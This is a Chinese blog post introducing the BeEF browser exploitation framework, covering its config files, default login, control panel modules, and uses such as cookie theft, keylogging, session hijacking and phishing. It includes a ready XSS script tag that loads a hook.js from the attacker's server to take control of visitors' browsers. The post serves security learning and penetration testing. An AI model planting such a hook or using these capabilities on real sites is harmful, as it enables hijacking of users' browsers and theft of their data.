简单介绍一下xss神器——BeEF

一、beef简介

BeEF全称(The Browser Exploitation Framework)是一种专注于Web浏览器的渗透测试工具,,通过XSS漏洞配合JS脚本和Metasploit进行渗透; BeEF是基于Ruby语言编写的,并且支持图形化界面,如果不是在kali上安装beef,需要用rvm安装Rudy

BeEF除了是XSS漏洞利用工具,还是一个XSS平台搭建工具,可以本地搭建也可以服务器上搭建,唯一的缺点是:不支持Windows

二、BeEF配置

相关文件

配置文件:

/etc/beef-xss/config.yaml 
/usr/share/beef-xss/config.yaml
Web界面管理控制台:http://192.168.175.101:3000/ui/panel

//用于查看上钩的鱼儿以及对不同的目标进行管理操作
//默认账号和密码:beef

shellcode探针:http://192.168.175.101:3000/hook.js

//只要有人运行该文件,就会在管理控制台上线(上钩)。

测试网址:http://192.168.175.101:3000/demos/butcher/index.html`

//只要有人访问该网站,也会在管理控制台上线(上钩)。

xss代码:<script src="http://192.168.175.101:3000/hook.js"></script>

界面功能

(1)Details(详细信息)

该模块主要显示受控主机的系统信息以及浏览器信息

(2)Logs

该模块记录受控主机在存放着xss恶意代码的页面上的使用痕迹(鼠标点击、输入、访问、离开)

(3)Command

该模块存放着BeEF的攻击载荷,可以利用里面的payload对当前浏览器进行攻击

在Command窗口,存放着一些可以执行的命令,不同颜色命令表示靶机浏览器的反应程度:
绿色模块:表示模块适用当前用户,并且执行结果对用户不可见;
灰色模块:模块为在目标浏览器上测试过;
橙色模块:模块可用,但结果对用户可见;
红色模块:表示模块不适用当前用户,有些红色模块也可以执行,会有较大反应。

(4)Proxy

该模块为代理模块,可以利用受控主机做为代理(右键,点击Use as Proxy),在Rider选项卡中的Forge Request编辑并发送想要发送的内容
参考文章:https://github.com/beefproject/beef/wiki/Tunneling

(5)xssrays

该模块检查页面(浏览器连接的地方)的链接、表单和URI路径是否容易受到XSS的攻击
//XSS Rays 是纯 Java 跨站点脚本(XSS)扫描程序,最初由 Gareth Heyes 在 2009 年开发

![2022-12-04T15:35:24.png][5]

(6)Network

该模块上的Map网络图会显示了受控主机本地网络的动态地图,识别出的网络主机会自动添加到地图中,

三、主要用途

信息收集:

1.网络发现
2.主机信息
3.Cookie获取
4.会话劫持
5.键盘记录
6.插件信息

持久化控制:

1.确认弹框
2.小窗口
3.中间人

社会工程:

1.点击劫持
2.弹窗告警
3.虚假页面
4.钓鱼页面

渗透攻击:

1.XSS Rays
2.Metasploit
3.CSRF攻击
4.DDOS攻击

四、在BeEF中使用metasploit

这里部署了好几次都没成功部署上去(T^T),等成功了再来补充

五、报错解决方法

kali2020启动beef-xss失败解决方法:

重装beef,ruby:

apt remove ruby
apt remove beef-xss
apt-get install ruby
apt-get install ruby-dev libpcap-dev
gem install eventmachine
apt-get install beef-xss
posted @ 2023-02-10 16:17  bcxc9405  阅读(1523)  评论(0)    收藏  举报
/*
*/